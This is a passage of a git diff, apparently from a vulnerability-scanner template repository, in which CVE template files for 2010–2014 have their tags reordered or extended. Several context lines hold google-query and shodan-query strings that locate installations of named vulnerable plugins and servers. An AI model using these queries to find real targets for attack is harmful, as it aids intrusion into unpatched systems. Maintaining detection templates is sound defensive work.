+ tags: cve2010,cve,lfi,edb,packetstorm,joomla,roberto_aloi
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml
index 44e3198e6f..7f6c150c8c 100644
--- a/http/cves/2010/CVE-2010-1983.yaml
+++ b/http/cves/2010/CVE-2010-1983.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: redcomponent
product: com_redtwitter
- tags: joomla,lfi,edb,packetstorm,cve,cve2010,redcomponent
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm,redcomponent
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml
index d417e287d9..f1f21952c5 100644
--- a/http/cves/2010/CVE-2010-2033.yaml
+++ b/http/cves/2010/CVE-2010-2033.yaml
@@ -23,7 +23,7 @@ info:
max-request: 1
vendor: percha
product: com_perchacategoriestree
- tags: packetstorm,cve,cve2010,joomla,lfi,percha
+ tags: cve,cve2010,packetstorm,joomla,lfi,percha
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml
index 43e2ec117e..9dac4b1bdb 100644
--- a/http/cves/2010/CVE-2010-2034.yaml
+++ b/http/cves/2010/CVE-2010-2034.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: percha
product: com_perchaimageattach
- tags: edb,packetstorm,cve,cve2010,joomla,lfi,percha
+ tags: cve2010,cve,edb,packetstorm,joomla,lfi,percha
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml
index 764f39ae1a..11dcd46c31 100644
--- a/http/cves/2010/CVE-2010-2035.yaml
+++ b/http/cves/2010/CVE-2010-2035.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: percha
product: com_perchagallery
- tags: packetstorm,cve,cve2010,joomla,lfi,edb,percha
+ tags: cve,cve2010,packetstorm,joomla,lfi,edb,percha
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml
index d198971167..f14f6e1941 100644
--- a/http/cves/2010/CVE-2010-2036.yaml
+++ b/http/cves/2010/CVE-2010-2036.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: percha
product: com_perchafieldsattach
- tags: cve2010,lfi,joomla,edb,packetstorm,cve,percha
+ tags: cve,cve2010,lfi,joomla,edb,packetstorm,percha
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml
index 2a84ad43d9..5031874204 100644
--- a/http/cves/2010/CVE-2010-2037.yaml
+++ b/http/cves/2010/CVE-2010-2037.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: percha
product: com_perchadownloadsattach
- tags: joomla,edb,packetstorm,cve,cve2010,lfi,percha
+ tags: cve2010,cve,joomla,edb,packetstorm,lfi,percha
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml
index 8f2d7df959..dc85155be2 100644
--- a/http/cves/2010/CVE-2010-2050.yaml
+++ b/http/cves/2010/CVE-2010-2050.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: m0r0n
product: com_mscomment
- tags: cve2010,joomla,lfi,edb,packetstorm,cve,m0r0n
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm,m0r0n
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml
index 833fba3283..365ef3e19e 100644
--- a/http/cves/2010/CVE-2010-2122.yaml
+++ b/http/cves/2010/CVE-2010-2122.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: joelrowley
product: com_simpledownload
- tags: cve,cve2010,joomla,lfi,edb,joelrowley
+ tags: cve2010,cve,joomla,lfi,edb,joelrowley
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml
index e5efbbbe3f..c25909cc34 100644
--- a/http/cves/2010/CVE-2010-2259.yaml
+++ b/http/cves/2010/CVE-2010-2259.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: tamlyncreative
product: com_bfsurvey_profree
- tags: cve2010,joomla,lfi,edb,cve,tamlyncreative
+ tags: cve,cve2010,joomla,lfi,edb,tamlyncreative
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml
index 636f1db8e8..74ba23ac05 100644
--- a/http/cves/2010/CVE-2010-2307.yaml
+++ b/http/cves/2010/CVE-2010-2307.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: motorola
product: surfboard_sbv6120e
- tags: cve2010,iot,lfi,motorola,edb,cve
+ tags: cve2010,cve,iot,lfi,motorola,edb
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml
index 155ed6a142..9b53a1b4f8 100644
--- a/http/cves/2010/CVE-2010-2507.yaml
+++ b/http/cves/2010/CVE-2010-2507.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: masselink
product: com_picasa2gallery
- tags: edb,packetstorm,cve,cve2010,joomla,lfi,masselink
+ tags: cve2010,cve,edb,packetstorm,joomla,lfi,masselink
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml
index 5a2d269838..081d87076d 100644
--- a/http/cves/2010/CVE-2010-2680.yaml
+++ b/http/cves/2010/CVE-2010-2680.yaml
@@ -23,7 +23,7 @@ info:
max-request: 1
vendor: harmistechnology
product: com_jesectionfinder
- tags: cve,cve2010,joomla,lfi,edb,packetstorm,harmistechnology
+ tags: cve2010,cve,joomla,lfi,edb,packetstorm,harmistechnology
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml
index f5d389cf57..8dce562bb0 100644
--- a/http/cves/2010/CVE-2010-2857.yaml
+++ b/http/cves/2010/CVE-2010-2857.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: danieljamesscott
product: com_music
- tags: cve2010,joomla,lfi,edb,cve,danieljamesscott
+ tags: cve,cve2010,joomla,lfi,edb,danieljamesscott
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml
index 9c8c59e8dc..5c7d3dad00 100644
--- a/http/cves/2010/CVE-2010-2861.yaml
+++ b/http/cves/2010/CVE-2010-2861.yaml
@@ -27,7 +27,7 @@ info:
vendor: adobe
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
- tags: adobe,kev,vulhub,cve,cve2010,coldfusion,lfi
+ tags: cve,cve2010,adobe,kev,vulhub,coldfusion,lfi
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml
index 37c55cc45b..74df63f5c9 100644
--- a/http/cves/2010/CVE-2010-2918.yaml
+++ b/http/cves/2010/CVE-2010-2918.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: visocrea
product: com_joomla_visites
- tags: joomla,lfi,edb,cve,cve2010,visocrea
+ tags: cve,cve2010,joomla,lfi,edb,visocrea
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml
index 1f104bcb7c..020e2e18b8 100644
--- a/http/cves/2010/CVE-2010-3203.yaml
+++ b/http/cves/2010/CVE-2010-3203.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: xmlswf
product: com_picsell
- tags: edb,cve,cve2010,joomla,lfi,xmlswf
+ tags: cve,cve2010,edb,joomla,lfi,xmlswf
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml
index 123ebd7f49..ad6c8127fb 100644
--- a/http/cves/2010/CVE-2010-3426.yaml
+++ b/http/cves/2010/CVE-2010-3426.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: 4you-studio
product: com_jphone
- tags: lfi,edb,packetstorm,cve,cve2010,joomla,4you-studio
+ tags: cve,cve2010,lfi,edb,packetstorm,joomla,4you-studio
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml
index aba32eb286..e05d6a9015 100644
--- a/http/cves/2010/CVE-2010-4282.yaml
+++ b/http/cves/2010/CVE-2010-4282.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: artica
product: pandora_fms
- tags: seclists,phpshowtime,edb,cve,cve2010,lfi,joomla,artica
+ tags: cve,cve2010,seclists,phpshowtime,edb,lfi,joomla,artica
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml
index 4dbae68153..844a683bfa 100644
--- a/http/cves/2010/CVE-2010-4719.yaml
+++ b/http/cves/2010/CVE-2010-4719.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: fxwebdesign
product: com_jradio
- tags: cve2010,joomla,lfi,edb,packetstorm,cve,fxwebdesign
+ tags: cve2010,cve,joomla,lfi,edb,packetstorm,fxwebdesign
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml
index 4a1c1bd897..a84b7ec54a 100644
--- a/http/cves/2010/CVE-2010-4977.yaml
+++ b/http/cves/2010/CVE-2010-4977.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: miniwork
product: com_canteen
- tags: joomla,lfi,edb,packetstorm,cve,cve2010,miniwork
+ tags: cve2010,cve,joomla,lfi,edb,packetstorm,miniwork,sqli
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml
index 4060c4e39c..bf78574591 100644
--- a/http/cves/2010/CVE-2010-5028.yaml
+++ b/http/cves/2010/CVE-2010-5028.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: harmistechnology
product: com_jejob
- tags: cve,cve2010,joomla,lfi,edb,harmistechnology
+ tags: cve,cve2010,joomla,lfi,edb,harmistechnology,sqli
http:
- method: GET
diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml
index 05e054c6da..6bc6d1d87e 100644
--- a/http/cves/2010/CVE-2010-5286.yaml
+++ b/http/cves/2010/CVE-2010-5286.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: joobi
product: com_jstore
- tags: cve,cve2010,joomla,lfi,edb,packetstorm,joobi
+ tags: cve2010,cve,joomla,lfi,edb,packetstorm,joobi
http:
- method: GET
diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml
index 5528047a15..fb05de9eff 100644
--- a/http/cves/2011/CVE-2011-1669.yaml
+++ b/http/cves/2011/CVE-2011-1669.yaml
@@ -26,7 +26,7 @@ info:
vendor: mikoviny
product: wp_custom_pages
google-query: inurl:"/wp-content/plugins/wp-custom-pages/"
- tags: edb,cve,cve2011,wordpress,wp-plugin,lfi,mikoviny
+ tags: cve,cve2011,edb,wordpress,wp-plugin,lfi,mikoviny
http:
- method: GET
diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml
index c74b6299d4..be16a3ae9b 100644
--- a/http/cves/2011/CVE-2011-4336.yaml
+++ b/http/cves/2011/CVE-2011-4336.yaml
@@ -23,7 +23,7 @@ info:
max-request: 1
vendor: tiki
product: tikiwiki_cms\/groupware
- tags: seclists,cve,cve2011,xss,tikiwiki,tiki
+ tags: cve,cve2011,seclists,xss,tikiwiki,tiki
http:
- method: GET
diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml
index 6b03042dfc..3bd4658fd9 100644
--- a/http/cves/2011/CVE-2011-4618.yaml
+++ b/http/cves/2011/CVE-2011-4618.yaml
@@ -27,7 +27,7 @@ info:
vendor: simplerealtytheme
product: advanced_text_widget_plugin
google-query: inurl:"/wp-content/plugins/advanced-text-widget"
- tags: cve,cve2011,wordpress,xss,wp-plugin,simplerealtytheme
+ tags: cve2011,cve,wordpress,xss,wp-plugin,simplerealtytheme
http:
- raw:
diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml
index c9a04bd4f9..ef171840b1 100644
--- a/http/cves/2011/CVE-2011-4804.yaml
+++ b/http/cves/2011/CVE-2011-4804.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: foobla
product: com_obsuggest
- tags: lfi,edb,cve,cve2011,joomla,foobla
+ tags: cve,cve2011,lfi,edb,joomla,foobla
http:
- method: GET
diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml
index 81fc43e5a7..bb5a729024 100644
--- a/http/cves/2011/CVE-2011-4926.yaml
+++ b/http/cves/2011/CVE-2011-4926.yaml
@@ -28,7 +28,7 @@ info:
vendor: bueltge
product: adminimize
google-query: inurl:"/wp-content/plugins/adminimize/"
- tags: cve,cve2011,wordpress,xss,wp-plugin,bueltge
+ tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge
http:
- method: GET
diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml
index 1c32f3d60a..0649b016ab 100644
--- a/http/cves/2011/CVE-2011-5181.yaml
+++ b/http/cves/2011/CVE-2011-5181.yaml
@@ -26,7 +26,7 @@ info:
vendor: clickdesk
product: clickdesk_live_support-live_chat_plugin
google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/"
- tags: cve,cve2011,wordpress,xss,wp-plugin,clickdesk
+ tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk
http:
- method: GET
diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml
index 348c2ec18e..13bc685895 100644
--- a/http/cves/2011/CVE-2011-5265.yaml
+++ b/http/cves/2011/CVE-2011-5265.yaml
@@ -25,7 +25,7 @@ info:
vendor: featurific_for_wordpress_project
product: featurific-for-wordpress
google-query: inurl:"/wp-content/plugins/featurific-for-wordpress"
- tags: cve,cve2011,wordpress,xss,wp-plugin,featurific_for_wordpress_project
+ tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project
http:
- method: GET
diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml
index cbcaad14ed..28f513386b 100644
--- a/http/cves/2012/CVE-2012-0392.yaml
+++ b/http/cves/2012/CVE-2012-0392.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: apache
product: struts
- tags: cve2012,apache,rce,struts,java,edb,cve
+ tags: cve,cve2012,apache,rce,struts,java,edb
http:
- method: GET
diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml
index 990069c471..166fedc8aa 100644
--- a/http/cves/2012/CVE-2012-0394.yaml
+++ b/http/cves/2012/CVE-2012-0394.yaml
@@ -30,7 +30,7 @@ info:
vendor: apache
product: struts
shodan-query: html:"Struts Problem Report"
- tags: ognl,injection,edb,cve,cve2012,apache,struts
+ tags: cve,cve2012,ognl,injection,edb,apache,struts
variables:
first: "{{rand_int(1000, 9999)}}"
second: "{{rand_int(1000, 9999)}}"
diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml
index 7e797d39ce..c2116f7e6c 100644
--- a/http/cves/2012/CVE-2012-0896.yaml
+++ b/http/cves/2012/CVE-2012-0896.yaml
@@ -28,7 +28,7 @@ info:
vendor: count_per_day_project
product: count_per_day
google-query: inurl:"/wp-content/plugins/count-per-day"
- tags: packetstorm,cve,cve2012,lfi,wordpress,wp-plugin,traversal,count_per_day_project
+ tags: cve,cve2012,packetstorm,lfi,wordpress,wp-plugin,traversal,count_per_day_project
http:
- method: GET
diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml
index 45f5774a28..290a33ef87 100644
--- a/http/cves/2012/CVE-2012-0901.yaml
+++ b/http/cves/2012/CVE-2012-0901.yaml
@@ -26,7 +26,7 @@ info:
vendor: attenzione
product: yousaytoo
google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin"
- tags: wp-plugin,packetstorm,cve,cve2012,wordpress,xss,attenzione
+ tags: cve,cve2012,wp-plugin,packetstorm,wordpress,xss,attenzione
http:
- method: GET
diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml
index cb6a21c41a..bc7be4a4d6 100644
--- a/http/cves/2012/CVE-2012-0981.yaml
+++ b/http/cves/2012/CVE-2012-0981.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: kybernetika
product: phpshowtime
- tags: phpshowtime,edb,cve,cve2012,lfi,kybernetika
+ tags: cve,cve2012,phpshowtime,edb,lfi,kybernetika
http:
- method: GET
diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml
index fe71b944ea..3db20d0ac5 100644
--- a/http/cves/2012/CVE-2012-0991.yaml
+++ b/http/cves/2012/CVE-2012-0991.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: openemr
product: openemr
- tags: lfi,openemr,traversal,edb,cve,cve2012
+ tags: cve,cve2012,lfi,openemr,traversal,edb
http:
- method: GET
diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml
index 03f626eedf..c61f5cea04 100644
--- a/http/cves/2012/CVE-2012-1823.yaml
+++ b/http/cves/2012/CVE-2012-1823.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: php
product: php
- tags: cve2012,kev,vulhub,rce,php,cve
+ tags: cve,cve2012,kev,vulhub,rce,php
http:
- raw:
diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml
index a6268c69f2..c849f3545b 100644
--- a/http/cves/2012/CVE-2012-2371.yaml
+++ b/http/cves/2012/CVE-2012-2371.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: mnt-tech
product: wp-facethumb
- tags: packetstorm,cve,cve2012,wordpress,xss,wp-plugin,mnt-tech
+ tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech
http:
- method: GET
diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml
index 47ed6cfce5..dda48bef20 100644
--- a/http/cves/2012/CVE-2012-4032.yaml
+++ b/http/cves/2012/CVE-2012-4032.yaml
@@ -29,7 +29,7 @@ info:
vendor: websitepanel
product: websitepanel
shodan-query: title:"WebsitePanel" html:"login"
- tags: packetstorm,cve,cve2012,redirect,websitepanel,authenticated
+ tags: cve,cve2012,packetstorm,redirect,websitepanel,authenticated
http:
- raw:
diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml
index 2a497a6055..812d706ac9 100644
--- a/http/cves/2012/CVE-2012-4253.yaml
+++ b/http/cves/2012/CVE-2012-4253.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: mysqldumper
product: mysqldumper
- tags: packetstorm,cve,cve2012,lfi,edb,mysqldumper
+ tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper,xss
http:
- method: GET
diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml
index 720cccde78..a732be88c7 100644
--- a/http/cves/2012/CVE-2012-4547.yaml
+++ b/http/cves/2012/CVE-2012-4547.yaml
@@ -25,7 +25,7 @@ info:
max-request: 2
vendor: laurent_destailleur
product: awstats
- tags: cve,cve2012,xss,awstats,edb,laurent_destailleur
+ tags: cve2012,cve,xss,awstats,edb,laurent_destailleur
http:
- method: GET
diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml
index b72890168b..58df5088f2 100644
--- a/http/cves/2012/CVE-2012-4768.yaml
+++ b/http/cves/2012/CVE-2012-4768.yaml
@@ -27,7 +27,7 @@ info:
vendor: mikejolley
product: download_monitor
framework: wordpress
- tags: xss,wp-plugin,packetstorm,cve,cve2012,wordpress,mikejolley
+ tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley
http:
- method: GET
diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml
index 469e05ae91..51b607f5bb 100644
--- a/http/cves/2012/CVE-2012-4878.yaml
+++ b/http/cves/2012/CVE-2012-4878.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: flatnux
product: flatnux
- tags: cve2012,lfi,traversal,edb,packetstorm,cve,flatnux
+ tags: cve,cve2012,lfi,traversal,edb,packetstorm,flatnux,xss
http:
- method: GET
diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml
index 86f4edfdf3..749c69d2ae 100644
--- a/http/cves/2012/CVE-2012-4940.yaml
+++ b/http/cves/2012/CVE-2012-4940.yaml
@@ -25,7 +25,7 @@ info:
max-request: 2
vendor: gecad
product: axigen_free_mail_server
- tags: edb,cve,cve2012,axigen,lfi,mail,gecad
+ tags: cve,cve2012,edb,axigen,lfi,mail,gecad
http:
- method: GET
diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml
index 2b9e972953..c5b48da6b2 100644
--- a/http/cves/2012/CVE-2012-5913.yaml
+++ b/http/cves/2012/CVE-2012-5913.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: wordpress_integrator_project
product: wordpress_integrator
- tags: cve2012,wordpress,xss,wp-plugin,packetstorm,cve,wordpress_integrator_project
+ tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project
http:
- method: GET
diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml
index 0a0ffb53c8..0b8dd8b133 100644
--- a/http/cves/2013/CVE-2013-1965.yaml
+++ b/http/cves/2013/CVE-2013-1965.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: apache
product: struts
- tags: cve,cve2013,apache,rce,struts,ognl
+ tags: cve2013,cve,apache,rce,struts,ognl
http:
- method: POST
diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml
index 1727ea4635..fe88b392c3 100644
--- a/http/cves/2013/CVE-2013-2248.yaml
+++ b/http/cves/2013/CVE-2013-2248.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: apache
product: struts
- tags: cve,cve2013,apache,redirect,struts,edb
+ tags: cve2013,cve,apache,redirect,struts,edb
http:
- method: GET
diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml
index 9e8277fe07..06d9867715 100644
--- a/http/cves/2013/CVE-2013-2251.yaml
+++ b/http/cves/2013/CVE-2013-2251.yaml
@@ -26,7 +26,7 @@ info:
max-request: 9
vendor: apache
product: struts
- tags: cve,cve2013,rce,struts,apache,ognl,kev
+ tags: cve2013,cve,rce,struts,apache,ognl,kev
http:
- raw:
diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml
index cd0a6e533f..e0ab00a2b0 100644
--- a/http/cves/2013/CVE-2013-2621.yaml
+++ b/http/cves/2013/CVE-2013-2621.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: telaen_project
product: telaen
- tags: cve,cve2012,telaen,redirect,telaen_project
+ tags: cve2013,cve,telaen,redirect,telaen_project
http:
- method: GET
diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml
index b755c01603..71126752fe 100644
--- a/http/cves/2013/CVE-2013-3526.yaml
+++ b/http/cves/2013/CVE-2013-3526.yaml
@@ -26,7 +26,7 @@ info:
vendor: wptrafficanalyzer
product: trafficanalyzer
google-query: inurl:"/wp-content/plugins/trafficanalyzer"
- tags: packetstorm,cve,cve2013,wordpress,xss,wp-plugin,wptrafficanalyzer
+ tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer
http:
- method: GET
diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml
index d96d3518d3..c5fb07ba93 100644
--- a/http/cves/2013/CVE-2013-3827.yaml
+++ b/http/cves/2013/CVE-2013-3827.yaml
@@ -25,7 +25,7 @@ info:
max-request: 10
vendor: oracle
product: fusion_middleware
- tags: edb,cve,cve2013,lfi,javafaces,oracle
+ tags: cve,cve2013,edb,lfi,javafaces,oracle
http:
- method: GET
diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml
index 53ebaa578c..c3c0c0178a 100644
--- a/http/cves/2013/CVE-2013-4117.yaml
+++ b/http/cves/2013/CVE-2013-4117.yaml
@@ -28,7 +28,7 @@ info:
vendor: anshul_sharma
product: category-grid-view-gallery
google-query: inurl:"/wp-content/plugins/category-grid-view-gallery"
- tags: seclists,packetstorm,cve2013,wordpress,xss,wp-plugin,cve
+ tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma
http:
- method: GET
diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml
index dc3fb151c8..4d35426b4d 100644
--- a/http/cves/2013/CVE-2013-4625.yaml
+++ b/http/cves/2013/CVE-2013-4625.yaml
@@ -27,7 +27,7 @@ info:
vendor: cory_lamle
product: duplicator
google-query: inurl:"/wp-content/plugins/duplicator"
- tags: seclists,cve,cve2013,wordpress,xss,wp-plugin,packetstorm,cory_lamle
+ tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle
http:
- method: GET
diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml
index d60c8c4129..567df07732 100644
--- a/http/cves/2013/CVE-2013-5528.yaml
+++ b/http/cves/2013/CVE-2013-5528.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: cisco
product: unified_communications_manager
- tags: cve,cve2013,lfi,cisco,edb
+ tags: cve2013,cve,lfi,cisco,edb
http:
- method: GET
diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml
index 707d599fc7..5d03db0878 100644
--- a/http/cves/2013/CVE-2013-5979.yaml
+++ b/http/cves/2013/CVE-2013-5979.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: springsignage
product: xibo
- tags: cve,cve2013,lfi,edb,springsignage
+ tags: cve2013,cve,lfi,edb,springsignage
http:
- method: GET
diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml
index 1a97f266f0..4ce02ecb4f 100644
--- a/http/cves/2013/CVE-2013-6281.yaml
+++ b/http/cves/2013/CVE-2013-6281.yaml
@@ -30,7 +30,7 @@ info:
product: dhtmlxspreadsheet
framework: wordpress
google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet
- tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin,dhtmlx
+ tags: cve2013,cve,wp,wpscan,wordpress,xss,wp-plugin,dhtmlx
http:
- raw:
diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml
index f2bc6a6480..4dbf06ef5f 100644
--- a/http/cves/2013/CVE-2013-7091.yaml
+++ b/http/cves/2013/CVE-2013-7091.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: synacor
product: zimbra_collaboration_suite
- tags: packetstorm,zimbra,lfi,edb,cve,cve2013,synacor
+ tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor
http:
- method: GET
diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml
index 56e3304741..9e5fcd14f9 100644
--- a/http/cves/2013/CVE-2013-7240.yaml
+++ b/http/cves/2013/CVE-2013-7240.yaml
@@ -28,7 +28,7 @@ info:
vendor: westerndeal
product: advanced_dewplayer
google-query: inurl:"/wp-content/plugins/advanced-dewplayer/"
- tags: wp-plugin,lfi,edb,seclists,cve,cve2013,wordpress,westerndeal
+ tags: cve,cve2013,wp-plugin,lfi,edb,seclists,wordpress,westerndeal
http:
- method: GET
diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml
index 808e595179..7821207191 100644
--- a/http/cves/2013/CVE-2013-7285.yaml
+++ b/http/cves/2013/CVE-2013-7285.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: xstream_project
product: xstream
- tags: cve,cve2013,xstream,deserialization,rce,oast,xstream_project
+ tags: cve2013,cve,xstream,deserialization,rce,oast,xstream_project
http:
- raw:
diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml
index 788156ebc0..5b03e70665 100644
--- a/http/cves/2014/CVE-2014-10037.yaml
+++ b/http/cves/2014/CVE-2014-10037.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: domphp
product: domphp
- tags: cve,cve2014,lfi,edb,domphp
+ tags: cve2014,cve,lfi,edb,domphp
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml
index 3cf15beb09..1613d2c0b9 100644
--- a/http/cves/2014/CVE-2014-1203.yaml
+++ b/http/cves/2014/CVE-2014-1203.yaml
